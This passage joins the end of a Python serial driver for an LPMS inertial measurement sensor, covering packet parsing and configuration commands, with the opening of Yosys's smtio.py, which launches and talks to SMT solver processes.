self.rx_state = self.PACKET_FUNCTION0
elif self.rx_state == self.PACKET_FUNCTION0:
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_FUNCTION1
elif self.rx_state == self.PACKET_FUNCTION1:
self.in_bytes.append(b)
self.current_function = self.__convert_rxbytes_to_int16(0, self.in_bytes)
self.rx_state = self.PACKET_LENGTH0
elif self.rx_state == self.PACKET_LENGTH0:
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_LENGTH1
elif self.rx_state == self.PACKET_LENGTH1:
self.in_bytes.append(b)
self.current_length = self.__convert_rxbytes_to_int16(0, self.in_bytes)
self.rx_state = self.PACKET_RAW_DATA
self.rx_index = 0
self.rx_buffer = []
elif self.rx_state == self.PACKET_RAW_DATA:
if self.rx_index == self.current_length:
self.lrc_check = self.current_address + self.current_function + self.current_length
self.lrc_check = self.lrc_check + sum([ord(c) for c in self.rx_buffer])
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_LRC_CHECK1
else:
# add length check
self.rx_buffer.append(b)
self.rx_index = self.rx_index + 1
elif self.rx_state == self.PACKET_LRC_CHECK1:
self.in_bytes.append(b)
self.lrcReceived = self.__convert_rxbytes_to_int16(0, self.in_bytes)
if self.lrcReceived == self.lrc_check:
self.__parse_function()
self.rx_state = self.PACKET_END
else:
self.rx_state = self.PACKET_END
def __parse_sensor_data(self, data_mode=32):
o = 0
r2d = 57.2958
if data_mode == 16:
converter = lambda offset, l: float(self.__convert_rxbytes_to_int16(offset, l)) / 1000.0
increment = 2
else:
converter = lambda offset, l: self.__convert_rxbytes_to_float(offset, l)
increment = 4
# TODO: Add timestamp counter mode/elapsed mode
self.timestamp = float(self.__convert_rxbytes_to_int(0, self.rx_buffer))
o += 4
if self.runOnce:
self.frame_counter = self.timestamp
self.runOnce = False
else:
self.frame_counter += 1
if self.sensor_configuration.gyro_enable:
self.gyr_x = converter(o, self.rx_buffer) * r2d
o += increment
self.gyr_y = converter(o, self.rx_buffer) * r2d
o += increment
self.gyr_z = converter(o, self.rx_buffer) * r2d
o += increment
if self.sensor_configuration.accelerometer_enable:
self.acc_x = converter(o, self.rx_buffer)
o += increment
self.acc_y = converter(o, self.rx_buffer)
o += increment
self.acc_z = converter(o, self.rx_buffer)
o += increment
if self.sensor_configuration.magnetometer_enable:
self.mag_x = converter(o, self.rx_buffer)
o += increment
self.mag_y = converter(o, self.rx_buffer)
o += increment
self.mag_z = converter(o, self.rx_buffer)
o += increment
# 100 Fixed point
if data_mode == 16:
self.mag_x *= 10
self.mag_y *= 10
self.mag_z *= 10
if self.sensor_configuration.angular_velocity_enable:
self.angular_vel_x = converter(o, self.rx_buffer) * r2d
o += increment
self.angular_vel_y = converter(o, self.rx_buffer) * r2d
o += increment
self.angular_vel_z = converter(o, self.rx_buffer) * r2d
o += increment
if self.sensor_configuration.quaternion_enable:
self.quat_w = converter(o, self.rx_buffer)
o += increment
self.quat_x = converter(o, self.rx_buffer)
o += increment
self.quat_y = converter(o, self.rx_buffer)
o += increment
self.quat_z = converter(o, self.rx_buffer)
o += increment
# 10000 Fixed point
if data_mode == 16:
self.quat_w /= 10
self.quat_x /= 10
self.quat_y /= 10
self.quat_z /= 10
if self.sensor_configuration.euler_enable:
self.euler_x = converter(o, self.rx_buffer) * r2d
o += increment
self.euler_y = converter(o, self.rx_buffer) * r2d
o += increment
self.euler_z = converter(o, self.rx_buffer) * r2d
o += increment
# 10000 Fixed point
if data_mode == 16:
self.euler_x /= 10
self.euler_y /= 10
self.euler_z /= 10
if self.sensor_configuration.linear_acceleration_enable:
self.linacc_x = converter(o, self.rx_buffer)
o += increment
self.linacc_y = converter(o, self.rx_buffer)
o += increment
self.linacc_z = converter(o, self.rx_buffer)
o += increment
if self.sensor_configuration.pressure_enable:
self.pressure = converter(o, self.rx_buffer)
o += increment
# 10 Fixed point
if data_mode == 16:
self.pressure *= 100
if self.sensor_configuration.altitude_enable:
self.altitude = converter(o, self.rx_buffer)
o += increment
# 10 Fixed point
if data_mode == 16:
self.altitude *= 100
if self.sensor_configuration.temperature_enable:
self.temperature = converter(o, self.rx_buffer)
o += increment
# 100 Fixed point
if data_mode == 16:
self.temperature *= 10
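# In 16-bit transfer mode the sensor sends fixed-point int16 values; the
# divisors below (1000 for gyro, accelerometer and linear acceleration,
# 100 for magnetometer and pressure, 10000 for quaternion and Euler angles)
# convert them back to floating point.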
def __parse_sensor_data_16bit(self):
o = 0
r2d = 57.2958
if self.sensor_configuration.timestamp_counter_mode_enable:
self.timestamp = float(self.__convert_rxbytes_to_int(0, self.rx_buffer))
else:
self.timestamp = self.__convert_rxbytes_to_float(0, self.rx_buffer)
o += 4
self.frame_counter += 1
if self.sensor_configuration.gyro_enable:
self.gyr_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0 * r2d
o += 2
self.gyr_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0 * r2d
o += 2
self.gyr_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0 * r2d
o += 2
if self.sensor_configuration.accelerometer_enable:
self.acc_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.acc_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.acc_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
if self.sensor_configuration.magnetometer_enable:
self.mag_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
self.mag_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
self.mag_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
if self.sensor_configuration.quaternion_enable:
self.quat_w = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
self.quat_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
self.quat_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
self.quat_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
if self.sensor_configuration.euler_enable:
self.euler_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0 * r2d
o += 2
self.euler_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0 * r2d
o += 2
self.euler_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0 * r2d
o += 2
if self.sensor_configuration.linear_acceleration_enable:
self.linacc_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.linacc_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.linacc_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
if self.sensor_configuration.pressure_enable:
self.pressure = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
# communication
def __get_config_register(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
if self.verbose: logd(self.TAG, "Get config register")
time.sleep(.1)
self.__lpbus_set_none(LPMS_GET_CONFIG)
self.wait_for_data = True
self.__wait_for_response()
def __send_data(self, function, length):
txlrc_check = 0
txBuffer = chr(0x3a)
txBuffer += self.__convert_int16_to_txbytes(self.imu_id)
txBuffer += self.__convert_int16_to_txbytes(function)
txBuffer += self.__convert_int16_to_txbytes(length)
if length > 0:
txBuffer += self.raw_tx_data
txlrc_check = self.imu_id + function + length
if length > 0:
txlrc_check += sum([ord(c) for c in self.raw_tx_data])
txBuffer += self.__convert_int16_to_txbytes(txlrc_check)
txBuffer += chr(0x0d)
txBuffer += chr(0x0a)
# debug purpose
# self.__print_str_to_hex(txBuffer)
bytesSent = self.serial_port.write(txBuffer)
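# Outgoing frames mirror the receive format: ':' start byte, 16-bit id,
# function and length fields, optional payload, a 16-bit LRC (sum of id,
# function, length and payload bytes), terminated by CR LF.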
def __lpbus_set_none(self, command):
self.__send_data(command, 0)
def __lpbus_set_int32(self, command, v):
self.raw_tx_data = self.__convert_int_to_txbytes(v)
self.__send_data(command, 4)
def __lpbus_set_data(self, command, length, dataBuffer):
self.raw_tx_data = dataBuffer
self.__send_data(command, length)
def __wait_for_response(self):
while self.wait_for_ack or self.wait_for_data:
time.sleep(.1)
def __parse_configuration_register(self, cr):
self.sensor_configuration.parse(cr)
# User command
def connect(self):
if self.__thread_is_alive():
loge(self.TAG, "Another connection established")
return False
try:
self.__clear_params()
self.thread = threading.Thread(target=self.__run, args=())
self.serial_port = serial.Serial(self.port, self.baudrate, timeout=None, xonxoff=False, rtscts=False, dsrdtr=False)
self.quit = False
logd(self.TAG , "Sensor connected")
#thread.daemon = True # Daemonize thread
self.thread.start() # Start the execution
time.sleep(1)
self.set_command_mode() # Switch to command mode for configuration
time.sleep(.2)
self.__get_config_register() # Read back the sensor configuration register
time.sleep(.2)
self.set_streaming_mode()
return True
except serial.SerialException:
loge(self.TAG, "Could not open port " + self.port)
loge(self.TAG, "Please try again")
return False
def disconnect(self):
self.quit = True
if self.__thread_is_alive():
self.thread.join()
logd(self.TAG , "sensor disconnected")
return True
def is_connected(self):
return self.is_sensor_connected
# Configuration and Status
def get_config_register(self):
"""
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(LPMS_GET_CONFIG)
self.wait_for_data = True
self.__wait_for_response()
"""
return self.sensor_configuration
def get_status_register(self):
pass
# Mode switching
def set_command_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
if self.verbose: logd(self.TAG, "Set command mode")
self.__lpbus_set_none(LPMS_GOTO_COMMAND_MODE)
self.wait_for_ack = True
self.__wait_for_response()
self.is_command_mode = True
def set_streaming_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set streaming mode")
self.__lpbus_set_none(LPMS_GOTO_STREAM_MODE)
self.wait_for_ack = True
self.__wait_for_response()
self.is_command_mode = False
# Data transmission
def get_sensor_data(self):
"""
get sensor data during command Mode
"""
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
if self.verbose: logd(self.TAG, "Get sensor data")
self.__lpbus_set_none(LPMS_GET_SENSOR_DATA)
self.wait_for_data = True
self.__wait_for_response()
return self.get_stream_data()
def get_stream_data(self):
"""
get sensor data during stream Mode
"""
data = []
data.append(self.imu_id)
data.append(self.timestamp)
data.append(self.frame_counter)
data.append(self.temperature)
data.append([self.acc_x, self.acc_y, self.acc_z])
data.append([self.gyr_x, self.gyr_y, self.gyr_z])
data.append([self.mag_x, self.mag_y, self.mag_z])
data.append([self.quat_w, self.quat_x, self.quat_y, self.quat_z])
data.append([self.euler_x, self.euler_y, self.euler_z])
data.append([self.linacc_x, self.linacc_y, self.linacc_z])
return data
def set_transmit_data(self):
pass
def set_baudrate(self, baud):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set baudrate: "+str(baud)+"bps")
self.__lpbus_set_int32(LPMS_SET_UART_BAUDRATE, baud)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
def set_stream_frequency(self, freq):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set stream freq: "+str(freq)+"Hz")
self.__lpbus_set_int32(LPMS_SET_STREAM_FREQ, freq)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
def set_stream_frequency_5Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_5HZ)
def set_stream_frequency_10Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_10HZ)
def set_stream_frequency_25Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_25HZ)
def set_stream_frequency_50Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_50HZ)
def set_stream_frequency_100Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_100HZ)
def set_stream_frequency_200Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_200HZ)
def set_stream_frequency_400Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_400HZ)
def set_16bit_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set 16 bit data")
self.__lpbus_set_int32(LPMS_SET_LPBUS_DATA_MODE, LPMS_LPBUS_DATA_MODE_16)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
def set_32bit_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set 32 bit data")
self.__lpbus_set_int32(LPMS_SET_LPBUS_DATA_MODE, LPMS_LPBUS_DATA_MODE_32)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
# Register value save and reset
def save_parameters(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Save parameters to sensor")
self.__lpbus_set_none(LPMS_WRITE_REGISTERS)
self.wait_for_ack = True
self.__wait_for_response()
self.set_streaming_mode()
def reset_factory(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Reset factory settings")
self.__lpbus_set_none(LPMS_RESET_FACTORY_VALUE)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
# Reference setting and offset reset
def reset_reference(self):
pass
def start_mag_calibration(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
self.set_command_mode()
if self.verbose: logd(self.TAG, "Start mag calibration")
self.__lpbus_set_none(LPMS_START_MAG_CALIBRATION)
self.wait_for_ack = True
self.__wait_for_response()
self.set_streaming_mode()
|
smtio.py
|
#
# yosys -- Yosys Open SYnthesis Suite
#
# Copyright (C) 2012 Clifford Wolf <clifford@clifford.at>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import sys, re, os, signal
import subprocess
if os.name == "posix":
import resource
from copy import deepcopy
from select import select
from time import time
from queue import Queue, Empty
from threading import Thread
# This is needed so that the recursive SMT2 S-expression parser
# does not run out of stack frames when parsing large expressions
if os.name == "posix":
smtio_reclimit = 64 * 1024
if sys.getrecursionlimit() < smtio_reclimit:
sys.setrecursionlimit(smtio_reclimit)
current_rlimit_stack = resource.getrlimit(resource.RLIMIT_STACK)
if current_rlimit_stack[0] != resource.RLIM_INFINITY:
smtio_stacksize = 128 * 1024 * 1024
if os.uname().sysname == "Darwin":
# MacOS has rather conservative stack limits
smtio_stacksize = 16 * 1024 * 1024
if current_rlimit_stack[1] != resource.RLIM_INFINITY:
smtio_stacksize = min(smtio_stacksize, current_rlimit_stack[1])
if current_rlimit_stack[0] < smtio_stacksize:
resource.setrlimit(resource.RLIMIT_STACK, (smtio_stacksize, current_rlimit_stack[1]))
# currently running solvers (so we can kill them)
running_solvers = dict()
forced_shutdown = False
solvers_index = 0
def force_shutdown(signum, frame):
global forced_shutdown
if not forced_shutdown:
forced_shutdown = True
if signum is not None:
print("<%s>" % signal.Signals(signum).name)
for p in running_solvers.values():
# os.killpg(os.getpgid(p.pid), signal.SIGTERM)
os.kill(p.pid, signal.SIGTERM)
sys.exit(1)
if os.name == "posix":
signal.signal(signal.SIGHUP, force_shutdown)
signal.signal(signal.SIGINT, force_shutdown)
signal.signal(signal.SIGTERM, force_shutdown)
def except_hook(exctype, value, traceback):
if not forced_shutdown:
sys.__excepthook__(exctype, value, traceback)
force_shutdown(None, None)
sys.excepthook = except_hook
hex_dict = {
"0": "0000", "1": "0001", "2": "0010", "3": "0011",
"4": "0100", "5": "0101", "6": "0110", "7": "0111",
"8": "1000", "9": "1001", "A": "1010", "B": "1011",
"C": "1100", "D": "1101", "E": "1110", "F": "1111",
"a": "1010", "b": "1011", "c": "1100", "d": "1101",
"e": "1110", "f": "1111"
}
class SmtModInfo:
def __init__(self):
self.inputs = set()
self.outputs = set()
self.registers = set()
self.memories = dict()
self.wires = set()
self.wsize = dict()
self.clocks = dict()
self.cells = dict()
self.asserts = dict()
self.covers = dict()
self.anyconsts = dict()
self.anyseqs = dict()
self.allconsts = dict()
self.allseqs = dict()
self.asize = dict()
class SmtIo:
def __init__(self, opts=None):
global solvers_index
self.logic = None
self.logic_qf = True
self.logic_ax = True
self.logic_uf = True
self.logic_bv = True
self.logic_dt = False
self.forall = False
self.produce_models = True
self.smt2cache = [list()]
self.p = None
self.p_index = solvers_index
solvers_index += 1
if opts is not None:
self.logic = opts.logic
self.solver = opts.solver
self.solver_opts = opts.solver_opts
self.debug_print = opts.debug_print
self.debug_file = opts.debug_file
self.dummy_file = opts.dummy_file
self.timeinfo = opts.timeinfo
self.unroll = opts.unroll
self.noincr = opts.noincr
self.info_stmts = opts.info_stmts
self.nocomments = opts.nocomments
else:
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.timeinfo = os.name != "nt"
self.unroll = False
self.noincr = False
self.info_stmts = list()
self.nocomments = False
self.start_time = time()
self.modinfo = dict()
self.curmod = None
self.topmod = None
self.setup_done = False
def __del__(self):
if self.p is not None and not forced_shutdown:
os.killpg(os.getpgid(self.p.pid), signal.SIGTERM)
if running_solvers is not None:
del running_solvers[self.p_index]
def setup(self):
assert not self.setup_done
if self.forall:
self.unroll = False
if self.solver == "yices":
if self.noincr:
self.popen_vargs = ['yices-smt2'] + self.solver_opts
else:
self.popen_vargs = ['yices-smt2', '--incremental'] + self.solver_opts
if self.solver == "z3":
self.popen_vargs = ['z3', '-smt2', '-in'] + self.solver_opts
if self.solver == "cvc4":
if self.noincr:
self.popen_vargs = ['cvc4', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
else:
self.popen_vargs = ['cvc4', '--incremental', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
if self.solver == "mathsat":
self.popen_vargs = ['mathsat'] + self.solver_opts
if self.solver == "boolector":
if self.noincr:
self.popen_vargs = ['boolector', '--smt2'] + self.solver_opts
else:
self.popen_vargs = ['boolector', '--smt2', '-i'] + self.solver_opts
self.unroll = True
if self.solver == "abc":
if len(self.solver_opts) > 0:
self.popen_vargs = ['yosys-abc', '-S', '; '.join(self.solver_opts)]
else:
self.popen_vargs = ['yosys-abc', '-S', '%blast; &sweep -C 5000; &syn4; &cec -s -m -C 2000']
self.logic_ax = False
self.unroll = True
self.noincr = True
if self.solver == "dummy":
assert self.dummy_file is not None
self.dummy_fd = open(self.dummy_file, "r")
else:
if self.dummy_file is not None:
self.dummy_fd = open(self.dummy_file, "w")
if not self.noincr:
self.p_open()
if self.unroll:
assert not self.forall
self.logic_uf = False
self.unroll_idcnt = 0
self.unroll_buffer = ""
self.unroll_sorts = set()
self.unroll_objs = set()
self.unroll_decls = dict()
self.unroll_cache = dict()
self.unroll_stack = list()
if self.logic is None:
self.logic = ""
if self.logic_qf: self.logic += "QF_"
if self.logic_ax: self.logic += "A"
if self.logic_uf: self.logic += "UF"
if self.logic_bv: self.logic += "BV"
if self.logic_dt: self.logic = "ALL"
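# With all defaults enabled this resolves to "QF_AUFBV"; a "yosys-smt2-stdt"
# info statement forces the logic to "ALL" for datatype support.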
self.setup_done = True
for stmt in self.info_stmts:
self.write(stmt)
if self.produce_models:
self.write("(set-option :produce-models true)")
self.write("(set-logic %s)" % self.logic)
def timestamp(self):
secs = int(time() - self.start_time)
return "## %3d:%02d:%02d " % (secs // (60*60), (secs // 60) % 60, secs % 60)
def replace_in_stmt(self, stmt, pat, repl):
if stmt == pat:
return repl
if isinstance(stmt, list):
return [self.replace_in_stmt(s, pat, repl) for s in stmt]
return stmt
def unroll_stmt(self, stmt):
if not isinstance(stmt, list):
return stmt
stmt = [self.unroll_stmt(s) for s in stmt]
if len(stmt) >= 2 and not isinstance(stmt[0], list) and stmt[0] in self.unroll_decls:
assert stmt[1] in self.unroll_objs
key = tuple(stmt)
if key not in self.unroll_cache:
decl = deepcopy(self.unroll_decls[key[0]])
self.unroll_cache[key] = "|UNROLL#%d|" % self.unroll_idcnt
decl[1] = self.unroll_cache[key]
self.unroll_idcnt += 1
if decl[0] == "declare-fun":
if isinstance(decl[3], list) or decl[3] not in self.unroll_sorts:
self.unroll_objs.add(decl[1])
decl[2] = list()
else:
self.unroll_objs.add(decl[1])
decl = list()
elif decl[0] == "define-fun":
arg_index = 1
for arg_name, arg_sort in decl[2]:
decl[4] = self.replace_in_stmt(decl[4], arg_name, key[arg_index])
arg_index += 1
decl[2] = list()
if len(decl) > 0:
decl = self.unroll_stmt(decl)
self.write(self.unparse(decl), unroll=False)
return self.unroll_cache[key]
return stmt
def p_thread_main(self):
while True:
data = self.p.stdout.readline().decode("ascii")
if data == "": break
self.p_queue.put(data)
self.p_queue.put("")
self.p_running = False
def p_open(self):
assert self.p is None
self.p = subprocess.Popen(self.popen_vargs, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
running_solvers[self.p_index] = self.p
self.p_running = True
self.p_next = None
self.p_queue = Queue()
self.p_thread = Thread(target=self.p_thread_main)
self.p_thread.start()
def p_write(self, data, flush):
assert self.p is not None
self.p.stdin.write(bytes(data, "ascii"))
if flush: self.p.stdin.flush()
def p_read(self):
assert self.p is not None
if self.p_next is not None:
data = self.p_next
self.p_next = None
return data
if not self.p_running:
return ""
return self.p_queue.get()
def p_poll(self, timeout=0.1):
assert self.p is not None
assert self.p_running
if self.p_next is not None:
return False
try:
self.p_next = self.p_queue.get(True, timeout)
return False
except Empty:
return True
def p_close(self):
assert self.p is not None
self.p.stdin.close()
self.p_thread.join()
assert not self.p_running
del running_solvers[self.p_index]
self.p = None
self.p_next = None
self.p_queue = None
self.p_thread = None
def write(self, stmt, unroll=True):
if stmt.startswith(";"):
self.info(stmt)
if not self.setup_done:
self.info_stmts.append(stmt)
return
elif not self.setup_done:
self.setup()
stmt = stmt.strip()
if self.nocomments or self.unroll:
stmt = re.sub(r" *;.*", "", stmt)
if stmt == "": return
if unroll and self.unroll:
stmt = self.unroll_buffer + stmt
self.unroll_buffer = ""
s = re.sub(r"\|[^|]*\|", "", stmt)
if s.count("(") != s.count(")"):
self.unroll_buffer = stmt + " "
return
s = self.parse(stmt)
if self.debug_print:
print("-> %s" % s)
if len(s) == 3 and s[0] == "declare-sort" and s[2] == "0":
self.unroll_sorts.add(s[1])
return
elif len(s) == 4 and s[0] == "declare-fun" and s[2] == [] and s[3] in self.unroll_sorts:
self.unroll_objs.add(s[1])
return
elif len(s) >= 4 and s[0] == "declare-fun":
for arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
elif len(s) >= 4 and s[0] == "define-fun":
for arg_name, arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
stmt = self.unparse(self.unroll_stmt(s))
if stmt == "(push 1)":
self.unroll_stack.append((
deepcopy(self.unroll_sorts),
deepcopy(self.unroll_objs),
deepcopy(self.unroll_decls),
deepcopy(self.unroll_cache),
))
if stmt == "(pop 1)":
self.unroll_sorts, self.unroll_objs, self.unroll_decls, self.unroll_cache = self.unroll_stack.pop()
if self.debug_print:
print("> %s" % stmt)
if self.debug_file:
print(stmt, file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None and not stmt.startswith("(get-"):
self.p_close()
if stmt == "(push 1)":
self.smt2cache.append(list())
elif stmt == "(pop 1)":
self.smt2cache.pop()
else:
if self.p is not None:
self.p_write(stmt + "\n", True)
self.smt2cache[-1].append(stmt)
else:
self.p_write(stmt + "\n", True)
def info(self, stmt):
if not stmt.startswith("; yosys-smt2-"):
return
fields = stmt.split()
if fields[1] == "yosys-smt2-nomem":
if self.logic is None:
self.logic_ax = False
if fields[1] == "yosys-smt2-nobv":
if self.logic is None:
self.logic_bv = False
if fields[1] == "yosys-smt2-stdt":
if self.logic is None:
self.logic_dt = True
if fields[1] == "yosys-smt2-forall":
if self.logic is None:
self.logic_qf = False
self.forall = True
if fields[1] == "yosys-smt2-module":
self.curmod = fields[2]
self.modinfo[self.curmod] = SmtModInfo()
if fields[1] == "yosys-smt2-cell":
self.modinfo[self.curmod].cells[fields[3]] = fields[2]
if fields[1] == "yosys-smt2-topmod":
self.topmod = fields[2]
if fields[1] == "yosys-smt2-input":
self.modinfo[self.curmod].inputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-output":
self.modinfo[self.curmod].outputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-register":
self.modinfo[self.curmod].registers.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-memory":
self.modinfo[self.curmod].memories[fields[2]] = (int(fields[3]), int(fields[4]), int(fields[5]), int(fields[6]), fields[7] == "async")
if fields[1] == "yosys-smt2-wire":
self.modinfo[self.curmod].wires.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-clock":
for edge in fields[3:]:
if fields[2] not in self.modinfo[self.curmod].clocks:
self.modinfo[self.curmod].clocks[fields[2]] = edge
elif self.modinfo[self.curmod].clocks[fields[2]] != edge:
self.modinfo[self.curmod].clocks[fields[2]] = "event"
if fields[1] == "yosys-smt2-assert":
self.modinfo[self.curmod].asserts["%s_a %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-cover":
self.modinfo[self.curmod].covers["%s_c %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-anyconst":
self.modinfo[self.curmod].anyconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-anyseq":
self.modinfo[self.curmod].anyseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allconst":
self.modinfo[self.curmod].allconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allseq":
self.modinfo[self.curmod].allseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
def hiernets(self, top, regs_only=False):
def hiernets_worker(nets, mod, cursor):
for netname in sorted(self.modinfo[mod].wsize.keys()):
if not regs_only or netname in self.modinfo[mod].registers:
nets.append(cursor + [netname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiernets_worker(nets, celltype, cursor + [cellname])
nets = list()
hiernets_worker(nets, top, [])
return nets
def hieranyconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hieranyseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hiermems(self, top):
def hiermems_worker(mems, mod, cursor):
for memname in sorted(self.modinfo[mod].memories.keys()):
mems.append(cursor + [memname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiermems_worker(mems, celltype, cursor + [cellname])
mems = list()
hiermems_worker(mems, top, [])
return mems
def read(self):
stmt = []
count_brackets = 0
while True:
if self.solver == "dummy":
line = self.dummy_fd.readline().strip()
else:
line = self.p_read().strip()
if self.dummy_file is not None:
self.dummy_fd.write(line + "\n")
count_brackets += line.count("(")
count_brackets -= line.count(")")
stmt.append(line)
if self.debug_print:
